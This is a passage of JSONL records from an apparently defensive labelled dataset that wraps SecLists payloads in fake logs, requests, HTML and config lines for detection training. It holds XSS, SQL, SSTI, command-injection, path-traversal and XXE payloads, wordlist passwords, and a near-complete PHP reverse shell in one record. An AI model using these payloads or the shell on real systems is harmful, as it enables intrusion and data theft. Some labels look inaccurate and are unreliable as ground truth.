"<style>@keyframes x{}</style><bdi style=\"animation-name:x\" onanimationstart=\"alert(1)\"></bdi>", "injection_type": "XSS"}}]} {"id": "seclists_01776", "source": "seclists", "source_license": "MIT", "text": "# Server log\n[ERROR] Failed to process: %0d", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "%0d", "injection_type": "cmd"}}]} {"id": "seclists_01777", "source": "seclists", "source_license": "MIT", "text": "GET /api/ping?host=||/usr/bin/id| HTTP/1.1\nHost: internal.corp", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "||/usr/bin/id|", "injection_type": "cmd"}}]} {"id": "seclists_01778", "source": "seclists", "source_license": "MIT", "text": "GET /profile?name=locals() HTTP/1.1\nHost: example.com", "findings": [{"category": "malicious", "subcategory": "malicious.ssti", "severity": "critical", "compliance": [], "fields": {"payload": "locals()", "injection_type": "SSTI"}}]} {"id": "seclists_01779", "source": "seclists", "source_license": "MIT", "text": "# Server log\n[ERROR] Failed to process: &lt", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "&lt", "injection_type": "cmd"}}]} {"id": "seclists_01780", "source": "seclists", "source_license": "MIT", "text": "filename=\\..\\..\\..\\..\\..\\..\\..\\..\\..\\..\\etc\\shadow%00", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "\\..\\..\\..\\..\\..\\..\\..\\..\\..\\..\\etc\\shadow%00", "injection_type": "cmd"}}]} {"id": "seclists_01781", "source": "seclists", "source_license": "MIT", "text": "GET /search?q=Author Name: kishor HTTP/1.1\nHost: example.com", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "Author Name: kishor", "injection_type": "XSS"}}]} {"id": "seclists_01782", "source": "seclists", "source_license": "MIT", "text": "REDIS_URL=redis://default:pookie@redis.internal:6379", "findings": [{"category": "credentials", "subcategory": "credentials.password", "severity": "critical", "compliance": ["NIST-800-53"], "fields": {"password": "pookie"}}]} {"id": "seclists_01783", "source": "seclists", "source_license": "MIT", "text": "<!-- User comment -->\n<p><isindex formaction=javascript:alert(1) type=submit value=click></p>", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "<isindex formaction=javascript:alert(1) type=submit value=click>", "injection_type": "XSS"}}]} {"id": "seclists_01784", "source": "seclists", "source_license": "MIT", "text": "#!/bin/bash\n# Deploy script\ntar -xzf print(`echo%20WQMIIN`.`echo%20$((36%2B90))`.`echo%20WQMIIN`.`echo%20WQMIIN`)%3B.%22WQMIIN", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "print(`echo%20WQMIIN`.`echo%20$((36%2B90))`.`echo%20WQMIIN`.`echo%20WQMIIN`)%3B.%22WQMIIN", "injection_type": "cmd"}}]} {"id": "seclists_01785", "source": "seclists", "source_license": "MIT", "text": "# Server log\n[ERROR] Failed to process: \">xxx<P>yyy", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "\">xxx<P>yyy", "injection_type": "cmd"}}]} {"id": "seclists_01786", "source": "seclists", "source_license": "MIT", "text": "REDIS_URL=redis://default:beaker@redis.internal:6379", "findings": [{"category": "credentials", "subcategory": "credentials.password", "severity": "critical", "compliance": ["NIST-800-53"], "fields": {"password": "beaker"}}]} {"id": "seclists_01787", "source": "seclists", "source_license": "MIT", "text": "spring.datasource.password=Hewlett-Packard,Admin,Admin,\nspring.datasource.url=jdbc:mysql://localhost:3306/app", "findings": [{"category": "credentials", "subcategory": "credentials.password", "severity": "critical", "compliance": ["NIST-800-53"], "fields": {"password": "Hewlett-Packard,Admin,Admin,"}}]} {"id": "seclists_01788", "source": "seclists", "source_license": "MIT", "text": "username=or 'text' > 't'&password=admin&submit=Login", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "or 'text' > 't'", "injection_type": "SQL"}}]} {"id": "seclists_01789", "source": "seclists", "source_license": "MIT", "text": "GET /api/users?id=admin') or '1'='1 HTTP/1.1\nHost: example.com", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "admin') or '1'='1", "injection_type": "SQL"}}]} {"id": "seclists_01790", "source": "seclists", "source_license": "MIT", "text": "POST /api/login HTTP/1.1\nContent-Type: application/json\n\ndb.injection.insert({success:1});", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "db.injection.insert({success:1});", "injection_type": "NoSQL"}}]} {"id": "seclists_01791", "source": "seclists", "source_license": "MIT", "text": "<input type=\"text\" value=\"<col draggable=\"true\" ondragstart=\"alert(1)\">test</col>\" name=\"search\">", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "<col draggable=\"true\" ondragstart=\"alert(1)\">test</col>", "injection_type": "XSS"}}]} {"id": "seclists_01792", "source": "seclists", "source_license": "MIT", "text": "<input type=\"text\" value=\"Exploit Description: Using an EMBED tag you can embed a Flash movie that contains XSS. If you add the attributes allowScriptAccess=\u201dnever\u201d and allownetworking=\u201dinternal\u201d it can mitigate this risk (thank you to Jonathan Vanasco for the info). Demo: http://ha.ckers.org/weird/xssflash.html :\" name=\"search\">", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "Exploit Description: Using an EMBED tag you can embed a Flash movie that contains XSS. If you add the attributes allowScriptAccess=\u201dnever\u201d and allownetworking=\u201dinternal\u201d it can mitigate this risk (thank you to Jonathan Vanasco for the info). Demo: http://ha.ckers.org/weird/xssflash.html :", "injection_type": "XSS"}}]} {"id": "seclists_01793", "source": "seclists", "source_license": "MIT", "text": "GET /search?q=Image w/CharCode HTTP/1.1\nHost: example.com", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "Image w/CharCode", "injection_type": "XSS"}}]} {"id": "seclists_01794", "source": "seclists", "source_license": "MIT", "text": "<html>\n<body>\n<!--#config errmsg=\"File not found, informs users and password\"-->\n</body>\n</html>", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "<!--#config errmsg=\"File not found, informs users and password\"-->", "injection_type": "SSI"}}]} {"id": "seclists_01795", "source": "seclists", "source_license": "MIT", "text": "filename=a)|id;", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "a)|id;", "injection_type": "cmd"}}]} {"id": "seclists_01796", "source": "seclists", "source_license": "MIT", "text": "GET /api/ping?host=%2A%28%7C%28objectclass%3D%2A%29%29 HTTP/1.1\nHost: internal.corp", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "%2A%28%7C%28objectclass%3D%2A%29%29", "injection_type": "cmd"}}]} {"id": "seclists_01797", "source": "seclists", "source_license": "MIT", "text": "# Server log\n[ERROR] Failed to process: \"||echo$IFSONWUBF$((85%2B46))$(echo$IFSONWUBF)ONWUBF%5C%5C", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "\"||echo$IFSONWUBF$((85%2B46))$(echo$IFSONWUBF)ONWUBF%5C%5C", "injection_type": "cmd"}}]} {"id": "seclists_01798", "source": "seclists", "source_license": "MIT", "text": "<input type=\"text\" value=\"<nobr id=x tabindex=1 onactivate=alert(1)></nobr>\" name=\"search\">", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "<nobr id=x tabindex=1 onactivate=alert(1)></nobr>", "injection_type": "XSS"}}]} {"id": "seclists_01799", "source": "seclists", "source_license": "MIT", "text": "<!-- User comment -->\n<p><form id=x tabindex=1 onfocusin=alert(1)></form></p>", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "<form id=x tabindex=1 onfocusin=alert(1)></form>", "injection_type": "XSS"}}]} {"id": "seclists_01800", "source": "seclists", "source_license": "MIT", "text": "# Server log\n[ERROR] Failed to process: 1; waitfor delay '0:30:0'--", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "1; waitfor delay '0:30:0'--", "injection_type": "cmd"}}]} {"id": "seclists_01801", "source": "seclists", "source_license": "MIT", "text": "#!/bin/bash\n# Deploy script\ntar -xzf %20echo%20AXKFNN$((42%2B98))$(echo%20AXKFNN)AXKFNN%27", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "%20echo%20AXKFNN$((42%2B98))$(echo%20AXKFNN)AXKFNN%27", "injection_type": "cmd"}}]} {"id": "seclists_01802", "source": "seclists", "source_license": "MIT", "text": "spring.datasource.password=Micron,<BLANK>,xyzall,\nspring.datasource.url=jdbc:mysql://localhost:3306/app", "findings": [{"category": "credentials", "subcategory": "credentials.password", "severity": "critical", "compliance": ["NIST-800-53"], "fields": {"password": "Micron,<BLANK>,xyzall,"}}]} {"id": "seclists_01803", "source": "seclists", "source_license": "MIT", "text": "filename=%3B%20str%3D%24%28echo%20KNETDA%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%204%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%7C", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "%3B%20str%3D%24%28echo%20KNETDA%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%204%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%7C", "injection_type": "cmd"}}]} {"id": "seclists_01804", "source": "seclists", "source_license": "MIT", "text": "GET /search?q=Author Name: ha.ckers.org HTTP/1.1\nHost: example.com", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "Author Name: ha.ckers.org", "injection_type": "XSS"}}]} {"id": "seclists_01805", "source": "seclists", "source_license": "MIT", "text": "filename=-1.0", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "-1.0", "injection_type": "cmd"}}]} {"id": "seclists_01806", "source": "seclists", "source_license": "MIT", "text": "<!-- User comment -->\n<p>Exploit String: </title><script>alert(1)</script></p>", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "Exploit String: </title><script>alert(1)</script>", "injection_type": "XSS"}}]} {"id": "seclists_01807", "source": "seclists", "source_license": "MIT", "text": "<html><body>\n<div class=\"user-content\">'+'';</div>\n</body></html>", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "'+'';", "injection_type": "XSS"}}]} {"id": "seclists_01808", "source": "seclists", "source_license": "MIT", "text": "#!/bin/bash\n# Deploy script\ntar -xzf %27%3B%20str%3D%24%28echo%20ASBPAS%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%208%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%7C", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "%27%3B%20str%3D%24%28echo%20ASBPAS%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%208%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%7C", "injection_type": "cmd"}}]} {"id": "seclists_01809", "source": "seclists", "source_license": "MIT", "text": "DB_PASSWORD=Hewlett-Packard,FIELD,SERVICE,\nDB_HOST=localhost\nDB_PORT=5432", "findings": [{"category": "credentials", "subcategory": "credentials.password", "severity": "critical", "compliance": ["NIST-800-53"], "fields": {"password": "Hewlett-Packard,FIELD,SERVICE,"}}]} {"id": "seclists_01810", "source": "seclists", "source_license": "MIT", "text": "SELECT * FROM users WHERE username = '||(elt(-3+5,bin(15),ord(10),hex(char(45))))';", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "||(elt(-3+5,bin(15),ord(10),hex(char(45))))", "injection_type": "SQL"}}]} {"id": "seclists_01811", "source": "seclists", "source_license": "MIT", "text": "<html><body>\n<div class=\"user-content\"><body onhelp=alert(1)>press F1! (MSIE)</div>\n</body></html>", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "<body onhelp=alert(1)>press F1! (MSIE)", "injection_type": "XSS"}}]} {"id": "seclists_01812", "source": "seclists", "source_license": "MIT", "text": "<html><body>\n<div class=\"user-content\">Exploit Description: IMG STYLE with expression (this is really a hybrid of several CSS XSS vectors, but it really does show how hard STYLE tags can be to parse apart, like the other CSS examples this can send IE into a loop).</div>\n</body></html>", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "Exploit Description: IMG STYLE with expression (this is really a hybrid of several CSS XSS vectors, but it really does show how hard STYLE tags can be to parse apart, like the other CSS examples this can send IE into a loop).", "injection_type": "XSS"}}]} {"id": "seclists_01813", "source": "seclists", "source_license": "MIT", "text": "# credentials.txt\nadmin:playstat", "findings": [{"category": "credentials", "subcategory": "credentials.password", "severity": "critical", "compliance": ["NIST-800-53"], "fields": {"password": "playstat"}}]} {"id": "seclists_01814", "source": "seclists", "source_license": "MIT", "text": "# Server log\n[ERROR] Failed to process: ;", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": ";", "injection_type": "cmd"}}]} {"id": "seclists_01815", "source": "seclists", "source_license": "MIT", "text": "#!/bin/bash\n# Deploy script\ntar -xzf &#X003C;", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "&#X003C;", "injection_type": "cmd"}}]} {"id": "seclists_01816", "source": "seclists", "source_license": "MIT", "text": "<!-- User comment -->\n<p>Exploit Tags: general, evil tags, obfuscated</p>", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "Exploit Tags: general, evil tags, obfuscated", "injection_type": "XSS"}}]} {"id": "seclists_01817", "source": "seclists", "source_license": "MIT", "text": "<!-- User comment -->\n<p><style>@keyframes x{}</style><image style=\"animation-name:x\" onanimationstart=\"alert(1)\"></image></p>", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "<style>@keyframes x{}</style><image style=\"animation-name:x\" onanimationstart=\"alert(1)\"></image>", "injection_type": "XSS"}}]} {"id": "seclists_01818", "source": "seclists", "source_license": "MIT", "text": "GET /api/users?id=(select top 1 HTTP/1.1\nHost: example.com", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "(select top 1", "injection_type": "SQL"}}]} {"id": "seclists_01819", "source": "seclists", "source_license": "MIT", "text": "<!-- User comment -->\n<p>Obfuscated XSS variant 1</p>", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "Obfuscated XSS variant 1", "injection_type": "XSS"}}]} {"id": "seclists_01820", "source": "seclists", "source_license": "MIT", "text": "<html><body>\n<div class=\"user-content\">Exploit Name: SSI</div>\n</body></html>", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "Exploit Name: SSI", "injection_type": "XSS"}}]} {"id": "seclists_01821", "source": "seclists", "source_license": "MIT", "text": "<!-- User comment -->\n<p>Author Name: .mario</p>", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "Author Name: .mario", "injection_type": "XSS"}}]} {"id": "seclists_01822", "source": "seclists", "source_license": "MIT", "text": "DB_PASSWORD=chrono\nDB_HOST=localhost\nDB_PORT=5432", "findings": [{"category": "credentials", "subcategory": "credentials.password", "severity": "critical", "compliance": ["NIST-800-53"], "fields": {"password": "chrono"}}]} {"id": "seclists_01823", "source": "seclists", "source_license": "MIT", "text": "<!-- User comment -->\n<p><source onkeyup=\"alert(1)\" contenteditable>test</source></p>", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "<source onkeyup=\"alert(1)\" contenteditable>test</source>", "injection_type": "XSS"}}]} {"id": "seclists_01824", "source": "seclists", "source_license": "MIT", "text": "<input type=\"text\" value=\"Exploit String: <FRAMESET><FRAME SRC=\"javascript:alert('XSS');\"></FRAMESET>\" name=\"search\">", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "Exploit String: <FRAMESET><FRAME SRC=\"javascript:alert('XSS');\"></FRAMESET>", "injection_type": "XSS"}}]} {"id": "seclists_01825", "source": "seclists", "source_license": "MIT", "text": "# Server log\n[ERROR] Failed to process: |/usr/bin/id", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "|/usr/bin/id", "injection_type": "cmd"}}]} {"id": "seclists_01826", "source": "seclists", "source_license": "MIT", "text": "<html><body>\n<div class=\"user-content\"><div draggable=\"true\" contenteditable>drag me</div><template ondragover=alert(1) contenteditable>drop here</template></div>\n</body></html>", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "<div draggable=\"true\" contenteditable>drag me</div><template ondragover=alert(1) contenteditable>drop here</template>", "injection_type": "XSS"}}]} {"id": "seclists_01827", "source": "seclists", "source_license": "MIT", "text": "<!-- User comment -->\n<p><meter oncopy=\"alert(1)\" contenteditable>test</meter></p>", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "<meter oncopy=\"alert(1)\" contenteditable>test</meter>", "injection_type": "XSS"}}]} {"id": "seclists_01828", "source": "seclists", "source_license": "MIT", "text": "<input type=\"text\" value=\"<noframes onmouseleave=\"alert(1)\">test</noframes>\" name=\"search\">", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "<noframes onmouseleave=\"alert(1)\">test</noframes>", "injection_type": "XSS"}}]} {"id": "seclists_01829", "source": "seclists", "source_license": "MIT", "text": "REDIS_URL=redis://default:Hewlett-Packard,MANAGER,COGNOS,@redis.internal:6379", "findings": [{"category": "credentials", "subcategory": "credentials.password", "severity": "critical", "compliance": ["NIST-800-53"], "fields": {"password": "Hewlett-Packard,MANAGER,COGNOS,"}}]} {"id": "seclists_01830", "source": "seclists", "source_license": "MIT", "text": "<input type=\"text\" value=\"Embedded Tab\" name=\"search\">", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "Embedded Tab", "injection_type": "XSS"}}]} {"id": "seclists_01831", "source": "seclists", "source_license": "MIT", "text": "#!/bin/bash\n# Deploy script\ntar -xzf &&echo%20NWPTID$((80%2B31))$(echo%20NWPTID)NWPTID", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "&&echo%20NWPTID$((80%2B31))$(echo%20NWPTID)NWPTID", "injection_type": "cmd"}}]} {"id": "seclists_01832", "source": "seclists", "source_license": "MIT", "text": "#!/bin/bash\n# Deploy script\ntar -xzf %3B%20str%3D%24%28echo%20SXGXTS%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%206%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%26", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "%3B%20str%3D%24%28echo%20SXGXTS%29%3B%20str1%3D%24%7B%23str%7D%3B%20if%20%5B%206%20-ne%20%24%7Bstr1%7D%20%5D%3B%20then%20sleep%200%3B%20else%20sleep%201%3B%20fi%20%26", "injection_type": "cmd"}}]} {"id": "seclists_01833", "source": "seclists", "source_license": "MIT", "text": "# Application log\n[2024-01-15 14:22:33] Query executed: SELECT name FROM products WHERE id = UNION ALL SELECT", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "UNION ALL SELECT", "injection_type": "SQL"}}]} {"id": "seclists_01834", "source": "seclists", "source_license": "MIT", "text": "<html><body>\n<div class=\"user-content\">Exploit Name: OBJECT w/Embedded XSS</div>\n</body></html>", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "Exploit Name: OBJECT w/Embedded XSS", "injection_type": "XSS"}}]} {"id": "seclists_01835", "source": "seclists", "source_license": "MIT", "text": "<input type=\"text\" value=\"Exploit Description: Case insensitive XSS attack vector.\" name=\"search\">", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "Exploit Description: Case insensitive XSS attack vector.", "injection_type": "XSS"}}]} {"id": "seclists_01836", "source": "seclists", "source_license": "MIT", "text": "GET /api/users?id=or 1=1/* HTTP/1.1\nHost: example.com", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "or 1=1/*", "injection_type": "SQL"}}]} {"id": "seclists_01837", "source": "seclists", "source_license": "MIT", "text": "DB_PASSWORD=ninjas\nDB_HOST=localhost\nDB_PORT=5432", "findings": [{"category": "credentials", "subcategory": "credentials.password", "severity": "critical", "compliance": ["NIST-800-53"], "fields": {"password": "ninjas"}}]} {"id": "seclists_01838", "source": "seclists", "source_license": "MIT", "text": "password: crow\nusername: admin\nhost: db.internal.corp", "findings": [{"category": "credentials", "subcategory": "credentials.password", "severity": "critical", "compliance": ["NIST-800-53"], "fields": {"password": "crow"}}]} {"id": "seclists_01839", "source": "seclists", "source_license": "MIT", "text": "REDIS_URL=redis://default:ACCTON,<BLANK>,0000,@redis.internal:6379", "findings": [{"category": "credentials", "subcategory": "credentials.password", "severity": "critical", "compliance": ["NIST-800-53"], "fields": {"password": "ACCTON,<BLANK>,0000,"}}]} {"id": "seclists_01840", "source": "seclists", "source_license": "MIT", "text": "# Server log\n[ERROR] Failed to process: |echo$IFSKBEHVQ$((68%2B63))$(echo$IFSKBEHVQ)KBEHVQ%2F%2F", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "|echo$IFSKBEHVQ$((68%2B63))$(echo$IFSKBEHVQ)KBEHVQ%2F%2F", "injection_type": "cmd"}}]} {"id": "seclists_01841", "source": "seclists", "source_license": "MIT", "text": "<?php\n// php-reverse-shell - A Reverse Shell implementation in PHP\n// Copyright (C) 2007 pentestmonkey@pentestmonkey.net\n//\n// This tool may be used for legal purposes only. Users take full responsibility\n// for any actions performed using this tool. The author accepts no liability\n// for damage caused by this tool. If these terms are not acceptable to you, then\n// do not use this tool.\n//\n// In all other respects the GPL version 2 applies:\n//\n// This program is free software; you can redistribute it and/or modify\n// it under the terms of the GNU General Public License version 2 as\n// published by the Free Software Foundation.\n//\n// This program is distributed in the hope that it will be useful,\n// but WITHOUT ANY WARRANTY; without even the implied warranty of\n// MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the\n// GNU General Public License for more details.\n//\n// You should have received a copy of the GNU General Public License along\n// with this program; if not, write to the Free Software Foundation, Inc.,\n// 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA.\n//\n// This tool may be used for legal purposes only. Users take full responsibility\n// for any actions performed using this tool. If these terms are not acceptable to\n// you, then do not use this tool.\n//\n// You are encouraged to send comments, improvements or suggestions to\n// me at pentestmonkey@pentestmonkey.net\n//\n// Description\n// -----------\n// This script will make an outbound TCP connection to a hardcoded IP and port.\n// The recipient will be given a shell running as the current user (apache normally).\n//\n// Limitations\n// -----------\n// proc_open and stream_set_blocking require PHP version 4.3+, or 5+\n// Use of stream_select() on file descriptors returned by proc_open() will fail and return FALSE under Windows.\n// Some compile-time options are needed for daemonisation (like pcntl, posix). These are rarely available.\n//\n// Usage\n// -----\n// See http://pentestmonkey.net/tools/php-reverse-shell if you get stuck.\n\nset_time_limit (0);\n$VERSION = \"1.0\";\n$ip = '10.2.2.1'; // CHANGE THIS\n$port = 8888; // CHANGE THIS\n$chunk_size = 1400;\n$write_a = null;\n$error_a = null;\n$shell = 'uname -a; w; id; /bin/sh -i';\n$daemon = 0;\n$debug = 0;\n\n//\n// Daemonise ourself if possible to avoid zombies later\n//\n\n// pcntl_fork is hardly ever available, but will allow us to daemonise\n// our php process and avoid zombies. Worth a try...\nif (function_exists('pcntl_fork')) {\n\t// Fork and have the parent process exit\n\t$pid = pcntl_fork();\n\t\n\tif ($pid == -1) {\n\t\tprintit(\"ERROR: Can't fork\");\n\t\texit(1);\n\t}\n\t\n\tif ($pid) {\n\t\texit(0); // Parent exits\n\t}\n\n\t// Make the current process a session leader\n\t// Will only succeed if we forked\n\tif (posix_setsid() == -1) {\n\t\tprintit(\"Error: Can't setsid()\");\n\t\texit(1);\n\t}\n\n\t$daemon = 1;\n} else {\n\tprintit(\"WARNING: Failed to daemonise. This is quite common and not fatal.\");\n}\n\n// Change to a safe directory\nchdir(\"/\");\n\n// Remove any umask we inherited\numask(0);\n\n//\n// Do the reverse shell...\n//\n\n// Open reverse connection\n$sock = fsockopen($ip, $port, $errno, $errstr, 30);\nif (!$sock) {\n\tprintit(\"$errstr ($errno)\");\n\texit(1);\n}\n\n// Spawn shell process\n$descriptorspec = array(\n 0 => array(\"pipe\", \"r\"), // stdin is a pipe that the child will read from\n 1 => array(\"pipe\", \"w\"), // stdout is a pipe that the child will write to\n 2 => array(\"pipe\", \"w\") // stderr is a pipe that the child will write to\n);\n\n$process = proc_open($shell, $descriptorspec, $pipes);\n\nif (!is_resource($process)) {\n\tprintit(\"ERROR: Can't spawn shell\");\n\texit(1);\n}\n\n// Set everything to non-blocking\n// Reason: Occsionally reads will block, even though stream_select tells us they won't\nstream_set_blocking($pipes[0], 0);\nstream_set_blocking($pipes[1], 0);\nstream_set_blocking($pipes[2], 0);\nstream_set_blocking($sock, 0);\n\nprintit(\"Successfully opened reverse shell to $ip:$port\");\n\nwhile (1) {\n\t// Check for end of TCP connection\n\tif (feof($sock)) ", "findings": [{"category": "malicious", "subcategory": "malicious.shell", "severity": "critical", "compliance": [], "fields": {"shell_type": "php", "filename": "php-reverse-shell.php"}}]} {"id": "seclists_01842", "source": "seclists", "source_license": "MIT", "text": "#!/bin/bash\n# Deploy script\ntar -xzf <?xml version=\"1.0\" encoding=\"ISO-8859-1\"?><!DOCTYPE foo [<!ELEMENT foo ANY><!ENTITY xxe SYSTEM \"file:////etc/shadow\">]><foo>&xxe;</foo>", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "<?xml version=\"1.0\" encoding=\"ISO-8859-1\"?><!DOCTYPE foo [<!ELEMENT foo ANY><!ENTITY xxe SYSTEM \"file:////etc/shadow\">]><foo>&xxe;</foo>", "injection_type": "cmd"}}]} {"id": "seclists_01843", "source": "seclists", "source_license": "MIT", "text": "<html><body>\n<div class=\"user-content\">XSS via VBScript MsgBox</div>\n</body></html>", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "XSS via VBScript MsgBox", "injection_type": "XSS"}}]} {"id": "seclists_01844", "source": "seclists", "source_license": "MIT", "text": "GET /api/ping?host=%27%7C%20%5B%201%20-ne%20%24%28echo%20CVUCAT%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%27 HTTP/1.1\nHost: internal.corp", "findings": [{"category": "malicious", "subcategory": "malicious.injection", "severity": "critical", "compliance": [], "fields": {"payload": "%27%7C%20%5B%201%20-ne%20%24%28echo%20CVUCAT%20%7C%20tr%20-d%20%27%5Cn%27%20%7C%20wc%20-c%29%20%5D%20%7C%7C%20sleep%201%20%27", "injection_type": "cmd"}}]} {"id": "seclists_01845", "source": "seclists", "source_license": "MIT", "text": "password: IBM,qsrv,qsrv,\nusername: admin\nhost: db.internal.corp", "findings": [{"category": "credentials", "subcategory": "credentials.password", "severity": "critical", "compliance": ["NIST-800-53"], "fields": {"password": "IBM,qsrv,qsrv,"}}]} {"id": "seclists_01846", "source": "seclists", "source_license": "MIT", "text": "spring.datasource.password=rPath,admin,password,\nspring.datasource.url=jdbc:mysql://localhost:3306/app", "findings": [{"category": "credentials", "subcategory": "credentials.password", "severity": "critical", "compliance": ["NIST-800-53"], "fields": {"password": "rPath,admin,password,"}}]} {"id": "seclists_01847", "source": "seclists", "source_license": "MIT", "text": "DB_PASSWORD=Inova,iclock,timely,\nDB_HOST=localhost\nDB_PORT=5432", "findings": [{"category": "credentials", "subcategory": "credentials.password", "severity": "critical", "compliance": ["NIST-800-53"], "fields": {"password": "Inova,iclock,timely,"}}]} {"id": "seclists_01848", "source": "seclists", "source_license": "MIT", "text": "GET /profile?name={{=42*42}} HTTP/1.1\nHost: example.com", "findings": [{"category": "malicious", "subcategory": "malicious.ssti", "severity": "critical", "compliance": [], "fields": {"payload": "{{=42*42}}", "injection_type": "SSTI"}}]} {"id": "seclists_01849", "source": "seclists", "source_license": "MIT", "text": "<input type=\"text\" value=\"<cite id=x tabindex=1 onfocus=alert(1)></cite>\" name=\"search\">", "findings": [{"category": 